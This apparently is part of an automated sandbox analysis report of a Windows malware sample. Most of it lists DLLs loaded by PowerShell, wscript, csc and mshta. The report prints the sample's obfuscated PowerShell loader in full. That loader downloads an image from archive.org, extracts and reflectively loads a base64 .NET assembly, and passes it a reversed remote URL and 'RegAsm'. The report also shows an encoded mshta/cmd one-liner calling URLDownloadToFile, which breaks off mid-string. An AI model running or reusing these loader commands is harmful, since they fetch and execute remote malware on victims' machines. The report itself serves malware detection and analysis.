Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: scorlib.pdb) source: powershell.exe, 00000009.00000002.3060308602.0000000007741000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.pdb source: powershell.exe, 00000003.00000002.2186146653.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.3060434950.000000000775C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.3059826365.00000000076FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: powershell.exe, 00000009.00000002.3047716005.0000000003075000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb* source: powershell.exe, 00000009.00000002.3060355000.000000000774B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbP source: powershell.exe, 00000009.00000002.3060355000.000000000774B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: powershell.exe, 00000009.00000002.3059826365.00000000076FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: l\mscorlib.pdb0 source: powershell.exe, 00000009.00000002.3060308602.0000000007741000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.3060434950.000000000775C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.3059826365.00000000076FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000009.00000002.3059826365.00000000076FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.3047716005.0000000003075000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.HGGCRR/033/04.022.3.291//:ptth', 'desativado', 'desativado', 'desativado', 'RegAsm', 'desat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.HGGCRR/033/04.022.3.2

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaK